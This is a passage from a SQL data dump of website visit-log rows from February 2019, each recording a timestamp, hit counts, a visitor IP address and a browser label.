2290,1,1,0,0,'54.36.148.26','other'),(389011,1550722630,1,1,0,0,'54.36.149.35','other'),(389012,1550722892,1,1,0,0,'66.249.66.138','chrome'),(389013,1550723005,1,1,0,0,'54.36.148.120','other'),(389014,1550723045,1,1,0,0,'95.163.255.96','other'),(389015,1550723271,1,1,0,0,'54.36.149.104','other'),(389016,1550723393,1,1,0,0,'46.229.168.150','other'),(389017,1550723478,1,1,0,0,'54.36.148.151','other'),(389018,1550723573,1,1,0,0,'216.244.66.241','other'),(389019,1550723587,1,1,0,0,'54.36.148.42','other'),(389020,1550724007,1,1,0,0,'54.36.148.158','other'),(389021,1550724058,1,1,0,0,'66.249.66.62','chrome'),(389022,1550724255,1,1,0,0,'54.36.149.51','other'),(389023,1550724589,1,1,0,0,'8.29.198.26','other'),(389025,1550724781,1,1,0,0,'157.55.39.159','other'),(389026,1550724855,1,1,0,0,'46.229.168.129','other'),(389027,1550725060,1,1,0,0,'54.36.149.22','other'),(389028,1550725112,2,2,0,0,'66.249.66.136','chrome'),(389029,1550725165,1,1,0,0,'54.36.149.93','other'),(389030,1550725370,1,1,0,0,'54.36.148.249','other'),(389031,1550725890,1,1,0,0,'178.93.148.182','chrome'),(389032,1550725989,1,1,0,0,'8.29.198.25','other'),(389033,1550726082,1,1,0,0,'54.36.150.125','other'),(389034,1550726352,1,1,0,0,'157.55.39.167','other'),(389035,1550726423,1,1,0,0,'40.77.167.112','other'),(389036,1550726619,1,1,0,0,'95.163.255.185','other'),(389037,1550726751,1,1,0,0,'46.229.168.150','other'),(389038,1550726873,1,1,0,0,'91.196.178.61','chrome'),(389039,1550727024,1,1,0,0,'66.249.66.136','chrome'),(389040,1550727115,1,1,0,0,'180.76.15.9','other'),(389041,1550727233,1,1,0,0,'54.36.150.191','other'),(389042,1550727273,1,1,0,0,'54.36.148.241','other'),(389043,1550727444,1,1,0,0,'54.36.149.13','other'),(389044,1550727605,1,1,0,0,'54.36.150.174','other'),(389045,1550727742,2,2,0,0,'66.249.66.134','chrome'),(389046,1550728039,1,1,0,0,'54.36.148.173','other'),(389047,1550728234,2,2,0,0,'66.249.66.60','chrome'),(389048,1550728917,1,1,0,0,'95.163.255.95','other'),(389049,1550729283,1,1,0,0,'87.118.110.27','other'),(389050,1550729342,1,1,0,0,'46.229.168.152','other'),(389051,1550729356,1,1,0,0,'54.36.150.68','other'),(389052,1550729394,1,1,0,0,'54.36.149.59','other'),(389053,1550729403,1,1,0,0,'46.229.168.148','other'),(389054,1550729480,1,1,0,0,'66.249.66.134','chrome'),(389055,1550729501,1,1,0,0,'66.249.66.218','chrome'),(389056,1550729508,1,1,0,0,'157.55.39.167','other'),(389057,1550729667,1,1,0,0,'54.36.148.1','other'),(389058,1550729744,1,1,0,0,'54.36.150.98','other'),(389059,1550729762,1,1,0,0,'54.36.148.17','other'),(389060,1550729765,1,1,0,0,'54.36.149.38','other'),(389061,1550729909,1,1,0,0,'54.36.148.107','other'),(389062,1550729954,1,1,0,0,'54.36.148.119','other'),(389063,1550730172,2,2,0,0,'91.196.178.87','chrome'),(389064,1550730221,1,1,0,0,'54.36.148.238','other'),(389065,1550730239,1,1,0,0,'54.36.150.101','other'),(389066,1550730267,1,1,0,0,'95.163.255.187','other'),(389067,1550730345,1,1,0,0,'54.36.149.93','other'),(389068,1550730355,1,1,0,0,'54.36.148.139','other'),(389069,1550730406,1,1,0,0,'54.36.148.15','other'),(389070,1550730441,1,1,0,0,'54.36.149.40','other'),(389071,1550730479,1,1,0,0,'95.163.255.92','other'),(389072,1550730707,1,1,0,0,'95.163.255.96','other'),(389073,1550730711,1,1,0,0,'95.163.255.194','other'),(389074,1550730737,1,1,0,0,'54.36.149.6','other'),(389075,1550730744,1,1,0,0,'212.92.238.220','chrome'),(389076,1550730898,1,1,0,0,'66.249.66.222','chrome'),(389077,1550731068,1,1,0,0,'66.249.66.136','chrome'),(389078,1550731269,1,1,0,0,'54.36.148.101','other'),(389079,1550731351,1,1,0,0,'92.113.58.218','chrome'),(389080,1550731423,1,1,0,0,'91.196.177.228','chrome'),(389081,1550731445,1,1,0,0,'66.249.66.138','chrome'),(389082,1550731525,1,1,0,0,'180.76.15.134','other'),(389083,1550731580,1,1,0,0,'91.196.178.94','chrome'),(389084,1550731781,1,1,0,0,'91.196.178.66','chrome'),(389085,1550732126,1,1,0,0,'66.249.66.220','chrome'),(389086,1550732211,1,1,0,0,'95.163.255.189','other'),(389087,1550732387,1,1,0,0,'54.36.150.38','other'),(389088,1550732494,1,1,0,0,'54.36.150.107','other'),(389089,1550732526,1,1,0,0,'54.36.148.227','other'),(389090,1550732996,1,1,0,0,'66.249.66.138','chrome'),(389091,1550733083,1,1,0,0,'54.36.149.107','other'),(389092,1550733111,1,1,0,0,'181.214.30.241','chrome'),(389093,1550733231,1,1,0,0,'66.249.66.136','chrome'),(389094,1550733469,2,2,0,0,'46.229.168.150','other'),(389095,1550733488,1,1,0,0,'54.36.148.42','other'),(389096,1550733753,1,1,0,0,'46.200.63.211','firefox'),(389097,1550733949,1,1,0,0,'95.163.255.175','other'),(389098,1550734181,1,1,0,0,'46.229.168.147','other'),(389099,1550734215,1,1,0,0,'216.244.66.241','other'),(389100,1550734249,1,1,0,0,'37.53.90.175','chrome'),(389101,1550734277,1,1,0,0,'212.92.238.220','chrome'),(389102,1550734537,1,1,0,0,'54.36.148.233','other'),(389103,1550734538,1,1,0,0,'95.163.255.94','other'),(389104,1550734540,1,1,0,0,'95.163.255.95','other'),(389105,1550734627,1,1,0,0,'157.55.39.159','other'),(389106,1550734673,2,2,0,0,'91.196.178.87','chrome'),(389107,1550734805,1,1,0,0,'62.221.40.186','chrome'),(389108,1550735061,1,1,0,0,'66.249.66.134','chrome'),(389109,1550735094,3,3,0,0,'91.124.63.207','chrome'),(389110,1550735102,1,1,0,0,'54.36.150.69','other'),(389111,1550735193,1,1,0,0,'46.229.168.144','other'),(389112,1550735250,1,1,0,0,'212.92.238.220','chrome'),(389113,1550735339,1,1,0,0,'66.249.66.138','chrome'),(389114,1550735375,1,1,0,0,'54.36.149.12','other'),(389115,1550735432,1,1,0,0,'8.29.198.26','other'),(389116,1550735521,2,2,0,0,'37.120.129.105','chrome'),(389117,1550735870,1,1,0,0,'178.92.198.223','opera'),(389118,1550735942,1,1,0,0,'62.221.40.186','chrome'),(389119,1550736119,1,1,0,0,'157.55.39.167','other'),(389120,1550736562,2,2,0,0,'207.46.13.210','other'),(389121,1550736578,2,2,0,0,'66.249.66.62','chrome'),(389122,1550736646,1,1,0,0,'66.249.66.134','chrome'),(389123,1550736662,1,1,0,0,'54.36.150.19','other'),(389124,1550736829,1,1,0,0,'8.29.198.26','other'),(389125,1550737067,1,1,0,0,'46.229.168.137','other'),(389126,1550737464,1,1,0,0,'54.36.149.41','other'),(389127,1550737560,1,1,0,0,'82.207.49.54','chrome'),(389128,1550737638,1,1,0,0,'216.244.66.241','other'),(389129,1550737840,1,1,0,0,'54.36.150.148','other'),(389130,1550737988,1,1,0,0,'46.229.168.129','other'),(389131,1550737996,1,1,0,0,'91.196.178.80','chrome'),(389132,1550738013,1,1,0,0,'66.249.66.58','chrome'),(389133,1550738798,1,1,0,0,'54.36.150.107','other'),(389134,1550739058,1,1,0,0,'66.249.66.220','chrome'),(389135,1550739233,1,1,0,0,'46.229.168.151','other'),(389136,1550739305,1,1,0,0,'91.196.178.135','firefox'),(389137,1550739332,1,1,0,0,'54.36.148.54','other'),(389138,1550739370,1,1,0,0,'95.163.255.171','other'),(389139,1550739508,1,1,0,0,'46.229.168.145','other'),(389140,1550739509,1,1,0,0,'54.36.148.27','other'),(389141,1550739594,1,1,0,0,'54.36.148.74','other'),(389142,1550739777,1,1,0,0,'157.55.39.167','other'),(389143,1550739861,1,1,0,0,'54.36.148.178','other'),(389144,1550739921,1,1,0,0,'52.53.201.78','chrome'),(389145,1550739925,1,1,0,0,'54.36.148.72','other'),(389146,1550739936,1,1,0,0,'66.249.66.58','chrome'),(389147,1550739951,1,1,0,0,'91.196.178.134','firefox'),(389148,1550739956,1,1,0,0,'54.36.148.146','other'),(389149,1550740059,1,1,0,0,'66.249.66.62','chrome'),(389150,1550740129,1,1,0,0,'95.163.255.93','other'),(389151,1550740292,1,1,0,0,'66.249.66.134','chrome'),(389152,1550740335,1,1,0,0,'91.196.178.80','chrome'),(389153,1550740453,1,1,0,0,'54.36.150.26','other'),(389154,1550740456,1,1,0,0,'54.36.150.36','other'),(389155,1550740613,1,1,0,0,'54.36.150.70','other'),(389156,1550741251,1,1,0,0,'91.196.178.94','chrome'),(389157,1550741377,1,1,0,0,'95.163.255.184','other'),(389158,1550741430,1,1,0,0,'54.36.150.122','other'),(389159,1550741863,1,1,0,0,'95.163.255.93','other'),(389160,1550741877,1,1,0,0,'95.163.255.94','other'),(389161,1550742220,1,1,0,0,'66.249.66.58','chrome'),(389162,1550742313,2,2,0,0,'216.244.66.241','other'),(389163,1550742475,1,1,0,0,'95.163.255.170','other'),(389164,1550742844,1,1,0,0,'178.154.244.11','other'),(389165,1550743274,1,1,0,0,'78.111.187.96','chrome'),(389166,1550743483,1,1,0,0,'157.55.39.167','other'),(389167,1550743736,1,1,0,0,'66.249.66.134','chrome'),(389168,1550743756,1,1,0,0,'95.163.255.158','other'),(389169,1550744299,1,1,0,0,'46.229.168.136','other'),(389170,1550744316,1,1,0,0,'66.249.66.220','chrome'),(389171,1550744510,1,1,0,0,'66.249.66.138','chrome'),(389172,1550744933,1,1,0,0,'109.70.100.23','chrome'),(389173,1550744978,1,1,0,0,'91.124.118.86','chrome'),(389174,1550745004,1,1,0,0,'195.10.210.70','chrome'),(389175,1550745919,1,1,0,0,'37.54.149.75','chrome'),(389176,1550745996,1,1,0,0,'5.45.207.79','other'),(389177,1550746278,1,1,0,0,'8.29.198.25','other'),(389178,1550746395,1,1,0,0,'46.211.26.84','chrome'),(389179,1550746396,1,1,0,0,'66.249.66.138','chrome'),(389180,1550746553,1,1,0,0,'54.36.148.249','other'),(389181,1550746572,1,1,0,0,'54.36.148.106','other'),(389182,1550746652,1,1,0,0,'54.36.149.58','other'),(389183,1550746655,1,1,0,0,'46.229.168.148','other'),(389184,1550747013,1,1,0,0,'54.36.148.253','other'),(389185,1550747095,1,1,0,0,'54.36.149.101','other'),(389186,1550747493,1,1,0,0,'54.36.148.235','other'),(389187,1550747506,1,1,0,0,'95.163.255.93','other'),(389188,1550747621,2,2,0,0,'91.196.82.13','chrome'),(389189,1550747665,1,1,0,0,'8.29.198.25','other'),(389190,1550747817,1,1,0,0,'95.163.255.95','other'),(389191,1550747824,1,1,0,0,'54.36.148.117','other'),(389192,1550747931,1,1,0,0,'91.196.178.168','chrome'),(389193,1550747969,1,1,0,0,'66.249.66.138','chrome'),(389194,1550748007,1,1,0,0,'46.229.168.136','other'),(389195,1550748064,1,1,0,0,'54.36.148.192','other'),(389196,1550748161,1,1,0,0,'193.56.151.34','chrome'),(389197,1550748164,2,2,0,0,'54.36.148.127','other'),(389198,1550748165,1,1,0,0,'54.36.149.106','other'),(389199,1550748328,1,1,0,0,'216.244.66.241','other'),(389200,1550748411,1,1,0,0,'66.249.66.60','chrome'),(389201,1550748495,1,1,0,0,'54.36.148.114','other'),(389202,1550748752,1,1,0,0,'46.229.168.135','other'),(389203,1550748856,1,1,0,0,'66.249.66.136','chrome'),(389204,1550748998,1,1,0,0,'46.229.168.149','other'),(389205,1550749122,6,6,0,0,'207.46.13.61','other'),(389206,1550749177,1,1,0,0,'46.229.168.144','other'),(389207,1550749573,1,1,0,0,'66.249.66.220','chrome'),(389208,1550749601,1,1,0,0,'217.69.143.217','firefox'),(389209,1550749640,1,1,0,0,'46.229.168.153','other'),(389210,1550749704,1,1,0,0,'54.36.148.151','other'),(389211,1550749727,1,1,0,0,'66.249.66.138','chrome'),(389212,1550749841,6,6,0,0,'157.55.39.212','other'),(389213,1550749847,3,3,0,0,'40.77.167.128','other'),(389214,1550749852,12,12,0,0,'40.77.167.99','other'),(389215,1550749875,1,1,0,0,'54.36.148.38','other'),(389216,1550749940,1,1,0,0,'176.36.21.189','chrome'),(389217,1550749953,1,1,0,0,'54.36.148.47','other'),(389218,1550750102,1,1,0,0,'91.196.178.165','chrome'),(389219,1550750174,1,1,0,0,'46.229.168.129','other'),(389220,1550750363,1,1,0,0,'54.36.149.107','other'),(389221,1550750947,1,1,0,0,'216.244.66.241','other'),(389222,1550750960,1,1,0,0,'54.36.148.149','other'),(389223,1550751149,1,1,0,0,'54.36.148.12','other'),(389224,1550751590,1,1,0,0,'40.77.167.99','other'),(389225,1550751624,1,1,0,0,'66.249.66.58','chrome'),(389226,1550751677,1,1,0,0,'54.36.148.233','other'),(389227,1550751687,1,1,0,0,'91.209.11.236','other'),(389228,1550751753,1,1,0,0,'54.36.149.85','other'),(389229,1550751759,1,1,0,0,'66.249.66.218','chrome'),(389230,1550752449,1,1,0,0,'207.46.13.61','other'),(389231,1550752466,1,1,0,0,'54.36.149.97','other'),(389232,1550752486,1,1,0,0,'54.36.148.74','other'),(389233,1550752666,1,1,0,0,'91.196.178.80','chrome'),(389234,1550752746,1,1,0,0,'176.36.21.189','chrome'),(389235,1550752790,1,1,0,0,'46.229.168.150','other'),(389236,1550752854,1,1,0,0,'54.36.149.106','other'),(389237,1550752873,1,1,0,0,'54.36.148.137','other'),(389238,1550753163,1,1,0,0,'46.229.168.145','other'),(389239,1550753208,1,1,0,0,'54.36.149.72','other'),(389240,1550753341,1,1,0,0,'54.36.148.197','other'),(389241,1550753372,1,1,0,0,'66.249.66.136','chrome'),(389242,1550753562,1,1,0,0,'216.244.66.241','other'),(389243,1550753688,1,1,0,0,'46.229.168.129','other'),(389244,1550753868,1,1,0,0,'54.36.148.251','other'),(389245,1550753871,1,1,0,0,'66.249.66.222','chrome'),(389246,1550754092,1,1,0,0,'54.36.148.125','other'),(389247,1550754190,1,1,0,0,'54.36.149.83','other'),(389248,1550754192,1,1,0,0,'46.201.234.35','chrome'),(389249,1550754255,1,1,0,0,'54.36.148.240','other'),(389250,1550754315,1,1,0,0,'54.36.148.54','other'),(389251,1550754477,1,1,0,0,'54.36.148.96','other'),(389252,1550754483,1,1,0,0,'95.163.255.194','other'),(389253,1550754934,1,1,0,0,'54.36.148.255','other'),(389254,1550755205,1,1,0,0,'54.36.148.140','other'),(389255,1550755404,1,1,0,0,'157.55.39.212','other'),(389256,1550755502,1,1,0,0,'54.36.149.51','other'),(389257,1550755736,1,1,0,0,'54.36.149.26','other'),(389258,1550756011,1,1,0,0,'91.196.178.83','firefox'),(389259,1550756105,1,1,0,0,'66.249.66.134','chrome'),(389260,1550756181,1,1,0,0,'37.55.110.61','chrome'),(389261,1550756551,1,1,0,0,'216.244.66.241','other'),(389262,1550756752,1,1,0,0,'54.36.148.21','other'),(389263,1550756763,1,1,0,0,'95.163.255.95','other'),(389264,1550756777,1,1,0,0,'95.163.255.93','other'),(389265,1550756922,1,1,0,0,'54.36.148.150','other'),(389266,1550757131,1,1,0,0,'8.29.198.25','other'),(389267,1550757413,1,1,0,0,'54.36.149.79','other'),(389268,1550757552,1,1,0,0,'54.36.148.41','other'),(389269,1550757558,1,1,0,0,'54.36.149.5','other'),(389270,1550758063,1,1,0,0,'157.55.39.212','other'),(389271,1550758192,1,1,0,0,'40.77.167.192','other'),(389272,1550758218,1,1,0,0,'95.132.53.160','chrome'),(389273,1550758304,1,1,0,0,'78.111.185.222','chrome'),(389274,1550758505,1,1,0,0,'8.29.198.25','other'),(389275,1550758618,1,1,0,0,'95.132.25.255','firefox'),(389276,1550758951,2,2,0,0,'216.244.66.241','other'),(389277,1550759237,1,1,0,0,'13.57.233.99','chrome'),(389278,1550759746,2,2,0,0,'54.36.148.190','other'),(389279,1550759769,1,1,0,0,'46.229.168.142','other'),(389280,1550759792,1,1,0,0,'212.90.58.36','chrome'),(389281,1550759920,1,1,0,0,'91.196.178.83','firefox'),(389282,1550759932,1,1,0,0,'66.249.66.136','chrome'),(389283,1550759984,1,1,0,0,'54.36.148.103','other'),(389284,1550759985,1,1,0,0,'195.10.210.70','chrome'),(389285,1550760155,1,1,0,0,'66.249.66.138','chrome'),(389286,1550760295,1,1,0,0,'54.36.148.158','other'),(389287,1550760296,1,1,0,0,'54.36.148.232','other'),(389288,1550761084,1,1,0,0,'54.36.148.78','other'),(389289,1550761248,1,1,0,0,'54.36.148.76','other'),(389290,1550761408,1,1,0,0,'54.36.149.61','other'),(389291,1550761795,1,1,0,0,'66.249.66.58','chrome'),(389292,1550762008,1,1,0,0,'54.36.148.180','other'),(389293,1550762072,1,1,0,0,'54.36.148.130','other'),(389294,1550762102,1,1,0,0,'94.179.147.128','chrome'),(389295,1550762139,1,1,0,0,'46.174.121.173','chrome'),(389296,1550762191,1,1,0,0,'54.36.148.101','other'),(389297,1550762724,1,1,0,0,'66.249.66.62','chrome'),(389298,1550763302,1,1,0,0,'46.46.87.151','other'),(389299,1550763347,1,1,0,0,'46.229.168.133','other'),(389300,1550763670,2,2,0,0,'91.209.11.236','other'),(389301,1550763705,1,1,0,0,'54.36.149.74','other'),(389302,1550764048,4,4,0,0,'216.244.66.241','other'),(389303,1550764075,1,1,0,0,'66.249.66.138','chrome'),(389304,1550764438,1,1,0,0,'54.36.149.77','other'),(389305,1550764653,1,1,0,0,'46.229.168.137','other'),(389306,1550764875,1,1,0,0,'78.27.161.140','other'),(389307,1550765100,1,1,0,0,'54.36.148.141','other'),(389308,1550765156,1,1,0,0,'46.211.131.51','chrome'),(389309,1550765261,1,1,0,0,'54.36.149.14','other'),(389310,1550765310,1,1,0,0,'46.229.168.148','other'),(389311,1550765405,1,1,0,0,'46.229.168.141','other'),(389312,1550765563,1,1,0,0,'91.209.11.236','other'),(389313,1550765564,1,1,0,0,'157.55.39.176','other'),(389314,1550765942,1,1,0,0,'95.163.255.153','other'),(389315,1550766066,1,1,0,0,'54.36.148.110','other'),(389316,1550766401,1,1,0,0,'54.36.149.5','other'),(389317,1550766406,1,1,0,0,'66.249.66.134','chrome'),(389318,1550766430,1,1,0,0,'54.36.148.90','other'),(389319,1550766517,1,1,0,0,'54.36.148.173','other'),(389320,1550766675,1,1,0,0,'95.163.255.174','other'),(389321,1550766794,1,1,0,0,'157.55.39.212','other'),(389322,1550767317,2,2,0,0,'66.249.66.136','chrome'),(389323,1550767620,1,1,0,0,'54.36.148.101','other'),(389324,1550767653,1,1,0,0,'46.229.168.130','other'),(389325,1550767758,1,1,0,0,'54.36.148.161','other'),(389326,1550767837,1,1,0,0,'54.36.148.214','other'),(389327,1550767846,1,1,0,0,'54.36.149.26','other'),(389328,1550767910,1,1,0,0,'54.36.148.75','other'),(389329,1550767982,1,1,0,0,'8.29.198.26','other'),(389330,1550768136,1,1,0,0,'207.46.13.250','other'),(389331,1550768333,1,1,0,0,'54.36.149.96','other'),(389332,1550768551,1,1,0,0,'54.36.148.51','other'),(389333,1550768727,1,1,0,0,'54.36.148.78','other'),(389334,1550769209,1,1,0,0,'66.249.66.60','chrome'),(389335,1550769332,1,1,0,0,'46.229.168.130','other'),(389336,1550769337,1,1,0,0,'8.29.198.27','other'),(389337,1550769362,1,1,0,0,'54.36.149.82','other'),(389338,1550769364,1,1,0,0,'216.244.66.241','other'),(389339,1550769409,1,1,0,0,'54.36.149.45','other'),(389340,1550769416,1,1,0,0,'91.196.178.161','chrome'),(389341,1550769695,1,1,0,0,'54.36.149.103','other'),(389342,1550770525,1,1,0,0,'54.36.148.229','other'),(389343,1550770721,1,1,0,0,'54.36.148.71','other'),(389344,1550770733,1,1,0,0,'167.114.172.225','other'),(389345,1550770761,1,1,0,0,'167.114.172.225','chrome'),(389346,1550770807,1,1,0,0,'54.36.148.147','other'),(389347,1550771097,1,1,0,0,'66.249.66.62','chrome'),(389348,1550771216,1,1,0,0,'95.163.255.182','other'),(389349,1550771259,1,1,0,0,'54.36.148.97','other'),(389350,1550771649,1,1,0,0,'46.229.168.138','other'),(389351,1550771681,1,1,0,0,'180.76.15.20','other'),(389352,1550771767,1,1,0,0,'54.36.149.4','other'),(389353,1550771773,1,1,0,0,'66.249.66.136','chrome'),(389354,1550771836,1,1,0,0,'54.36.148.63','other'),(389355,1550771842,3,3,0,0,'216.244.66.241','other'),(389356,1550771846,1,1,0,0,'207.46.13.105','other'),(389357,1550771878,1,1,0,0,'95.163.255.173','other'),(389358,1550771946,1,1,0,0,'46.229.168.147','other'),(389359,1550772552,1,1,0,0,'91.209.11.236','other'),(389360,1550772616,1,1,0,0,'54.36.149.52','other'),(389361,1550773066,1,1,0,0,'54.36.148.11','other'),(389362,1550773094,1,1,0,0,'46.229.168.137','other'),(389363,1550773155,1,1,0,0,'46.229.168.143','other'),(389364,1550773208,1,1,0,0,'54.36.149.12','other'),(389365,1550773230,1,1,0,0,'66.249.66.136','chrome'),(389366,1550773253,1,1,0,0,'207.46.13.250','other'),(389367,1550773555,1,1,0,0,'54.36.148.77','other'),(389368,1550773858,1,1,0,0,'207.46.13.182','other'),(389369,1550773870,1,1,0,0,'54.36.148.76','other'),(389370,1550774303,1,1,0,0,'46.229.168.148','other'),(389371,1550774817,2,2,0,0,'216.244.66.241','other'),(389372,1550775048,1,1,0,0,'46.229.168.132','other'),(389373,1550775144,1,1,0,0,'46.229.168.146','other'),(389374,1550775160,1,1,0,0,'54.36.149.38','other'),(389375,1550775313,1,1,0,0,'95.163.255.97','other'),(389376,1550775762,1,1,0,0,'54.36.148.209','other'),(389377,1550775822,1,1,0,0,'95.163.255.160','other'),(389378,1550775909,1,1,0,0,'54.36.149.101','other'),(389379,1550776203,1,1,0,0,'46.229.168.138','other'),(389380,1550776258,1,1,0,0,'207.46.13.123','other'),(389381,1550776651,1,1,0,0,'92.113.21.77','chrome'),(389382,1550776967,1,1,0,0,'95.163.255.172','other'),(389383,1550777145,1,1,0,0,'54.36.148.195','other'),(389384,1550777514,2,2,0,0,'216.244.66.241','other'),(389385,1550777522,1,1,0,0,'66.249.66.134','chrome'),(389386,1550777933,1,1,0,0,'54.36.148.251','other'),(389387,1550778077,1,1,0,0,'54.36.148.228','other'),(389388,1550778099,1,1,0,0,'54.36.148.164','other'),(389389,1550778261,1,1,0,0,'54.36.149.7','other'),(389390,1550778398,1,1,0,0,'54.36.149.11','other'),(389391,1550778823,1,1,0,0,'8.29.198.26','other'),(389392,1550779073,1,1,0,0,'66.249.66.138','chrome'),(389393,1550779395,1,1,0,0,'91.196.178.133','firefox'),(389394,1550779560,1,1,0,0,'54.36.148.125','other'),(389395,1550779566,1,1,0,0,'54.36.149.6','other'),(389396,1550780198,1,1,0,0,'8.29.198.26','other'),(389397,1550780267,1,1,0,0,'46.229.168.140','other'),(389398,1550780285,1,1,0,0,'54.36.149.89','other'),(389399,1550780568,1,1,0,0,'54.36.149.97','other'),(389400,1550780592,1,1,0,0,'66.249.66.138','chrome'),(389401,1550780773,2,2,0,0,'216.244.66.241','other'),(389402,1550780891,1,1,0,0,'54.36.148.228','other'),(389403,1550781406,1,1,0,0,'95.163.255.93','other'),(389404,1550781453,2,2,0,0,'207.46.13.123','other'),(389405,1550781467,1,1,0,0,'157.55.39.95','other'),(389406,1550781579,1,1,0,0,'54.36.149.24','other'),(389407,1550781789,1,1,0,0,'188.163.5.20','chrome'),(389408,1550782569,1,1,0,0,'54.36.148.55','other'),(389409,1550782649,1,1,0,0,'54.36.148.110','other'),(389410,1550782702,1,1,0,0,'46.229.168.145','other'),(389411,1550782742,1,1,0,0,'46.229.168.152','other'),(389412,1550782944,1,1,0,0,'157.55.39.95','other'),(389413,1550783322,1,1,0,0,'216.244.66.241','other'),(389414,1550783445,1,1,0,0,'180.76.15.18','other'),(389415,1550783495,1,1,0,0,'54.36.148.93','other'),(389416,1550783669,1,1,0,0,'54.36.148.211','other'),(389417,1550783842,1,1,0,0,'54.36.148.197','other'),(389418,1550783888,1,1,0,0,'207.46.13.50','other'),(389419,1550783941,1,1,0,0,'54.36.148.122','other'),(389420,1550783944,1,1,0,0,'157.55.39.95','other'),(389421,1550784006,1,1,0,0,'54.36.148.192','other'),(389422,1550784619,1,1,0,0,'54.36.149.35','other'),(389423,1550784654,1,1,0,0,'109.201.154.172','other'),(389424,1550784802,2,2,0,0,'66.249.66.134','chrome'),(389425,1550784859,1,1,0,0,'95.163.255.105','other'),(389426,1550784931,1,1,0,0,'54.36.148.65','other'),(389427,1550785052,1,1,0,0,'54.36.148.244','other'),(389428,1550785083,1,1,0,0,'54.36.149.45','other'),(389429,1550785090,1,1,0,0,'54.36.149.38','other'),(389430,1550785164,1,1,0,0,'5.188.210.53','chrome'),(389431,1550785271,1,1,0,0,'54.36.148.230','other'),(389432,1550785341,1,1,0,0,'95.163.255.95','other'),(389433,1550785409,1,1,0,0,'180.76.15.15','other'),(389434,1550785482,1,1,0,0,'157.55.39.84','other'),(389435,1550785604,1,1,0,0,'54.36.149.91','other'),(389436,1550786010,1,1,0,0,'66.249.66.136','chrome'),(389437,1550786364,1,1,0,0,'54.36.148.16','other'),(389438,1550786925,1,1,0,0,'54.36.148.99','other'),(389439,1550787332,1,1,0,0,'54.36.149.92','other'),(389440,1550787406,2,2,0,0,'66.249.66.136','chrome'),(389441,1550787409,1,1,0,0,'180.76.15.8','other'),(389442,1550787523,1,1,0,0,'54.36.150.51','other'),(389443,1550787674,1,1,0,0,'54.36.148.219','other'),(389444,1550787722,1,1,0,0,'46.229.168.130','other'),(389445,1550787771,1,1,0,0,'66.249.66.138','chrome'),(389446,1550787849,1,1,0,0,'207.46.13.50','other'),(389447,1550788044,1,1,0,0,'54.36.149.7','other'),(389448,1550788243,1,1,0,0,'216.244.66.241','other'),(389449,1550789244,1,1,0,0,'54.36.148.24','other'),(389450,1550789601,1,1,0,0,'207.46.13.50','other'),(389451,1550789626,1,1,0,0,'66.249.66.136','chrome'),(389452,1550789683,1,1,0,0,'8.29.198.25','other'),(389453,1550789919,1,1,0,0,'54.36.150.123','other'),(389454,1550790007,1,1,0,0,'54.36.148.196','other'),(389455,1550790044,1,1,0,0,'95.163.255.93','other'),(389456,1550790054,1,1,0,0,'54.36.149.54','other'),(389457,1550790074,1,1,0,0,'54.36.150.16','other'),(389458,1550790707,1,1,0,0,'157.55.39.94','other'),(389459,1550790766,3,3,0,0,'216.244.66.241','other'),(389460,1550791039,1,1,0,0,'8.29.198.27','other'),(389461,1550791095,1,1,0,0,'95.163.255.92','other'),(389462,1550791331,1,1,0,0,'54.36.148.197','other'),(389463,1550791481,1,1,0,0,'54.36.150.177','other'),(389464,1550791653,1,1,0,0,'54.36.148.92','other'),(389465,1550791665,1,1,0,0,'54.36.150.139','other'),(389466,1550792110,1,1,0,0,'54.36.148.30','other'),(389467,1550792269,1,1,0,0,'54.36.148.80','other'),(389468,1550793373,1,1,0,0,'216.244.66.241','other'),(389469,1550793495,1,1,0,0,'54.36.150.12','other'),(389470,1550793555,1,1,0,0,'54.36.149.16','other'),(389471,1550793884,1,1,0,0,'157.55.39.145','other'),(389472,1550793940,1,1,0,0,'54.36.148.12','other'),(389473,1550794519,1,1,0,0,'54.36.149.28','other'),(389474,1550794543,1,1,0,0,'54.36.150.178','other'),(389475,1550794903,1,1,0,0,'157.55.39.94','other'),(389476,1550795192,1,1,0,0,'95.163.255.183','other'),(389477,1550795236,1,1,0,0,'66.249.66.62','chrome'),(389478,1550795528,1,1,0,0,'54.36.150.120','other'),(389479,1550795622,1,1,0,0,'54.36.148.2','other'),(389480,1550795683,1,1,0,0,'54.36.149.62','other'),(389481,1550795745,1,1,0,0,'54.36.148.109','other'),(389482,1550795774,1,1,0,0,'54.36.150.68','other'),(389483,1550795881,1,1,0,0,'216.244.66.241','other'),(389484,1550796049,1,1,0,0,'54.36.149.84','other'),(389485,1550796724,1,1,0,0,'54.36.148.105','other'),(389486,1550796758,1,1,0,0,'54.36.150.161','other'),(389487,1550796795,1,1,0,0,'157.55.39.215','other'),(389488,1550796948,1,0,1,0,'66.249.66.136',''),(389489,1550797344,1,1,0,0,'95.163.255.169','other'),(389490,1550797346,1,1,0,0,'95.163.255.167','other'),(389491,1550797583,1,1,0,0,'54.36.148.142','other'),(389492,1550797690,1,1,0,0,'66.249.66.134','chrome'),(389493,1550797855,1,1,0,0,'54.36.148.36','other'),(389494,1550797922,1,1,0,0,'54.36.148.95','other'),(389495,1550797941,1,1,0,0,'54.36.148.102','other'),(389496,1550797957,1,1,0,0,'18.234.64.80','chrome'),(389497,1550798419,1,1,0,0,'54.36.148.127','other'),(389498,1550798653,1,1,0,0,'54.36.149.19','other'),(389499,1550798667,2,2,0,0,'216.244.66.241','other'),(389500,1550798709,1,1,0,0,'46.229.168.145','other'),(389501,1550798752,1,1,0,0,'95.163.255.187','other'),(389502,1550798948,1,1,0,0,'54.36.148.106','other'),(389503,1550798975,1,1,0,0,'46.229.168.140','other'),(389504,1550799644,1,1,0,0,'40.77.167.29','other'),(389505,1550800261,2,2,0,0,'54.244.99.114','chrome'),(389506,1550800383,1,1,0,0,'54.36.148.70','other'),(389507,1550800519,1,1,0,0,'8.29.198.26','other'),(389508,1550801216,1,1,0,0,'54.36.150.187','other'),(389509,1550801357,1,1,0,0,'40.77.167.9','other'),(389510,1550801401,1,1,0,0,'157.55.39.94','other'),(389511,1550801696,3,3,0,0,'216.244.66.241','other'),(389512,1550801764,1,1,0,0,'54.36.150.139','other'),(389513,1550801820,1,1,0,0,'54.36.148.72','other'),(389514,1550801874,1,1,0,0,'8.29.198.25','other'),(389515,1550802255,1,1,0,0,'46.229.168.150','other'),(389516,1550802354,1,1,0,0,'54.36.148.0','other'),(389517,1550802401,1,1,0,0,'46.229.168.132','other'),(389518,1550802550,1,1,0,0,'54.36.150.107','other'),(389519,1550802607,1,1,0,0,'46.229.168.144','other'),(389520,15508026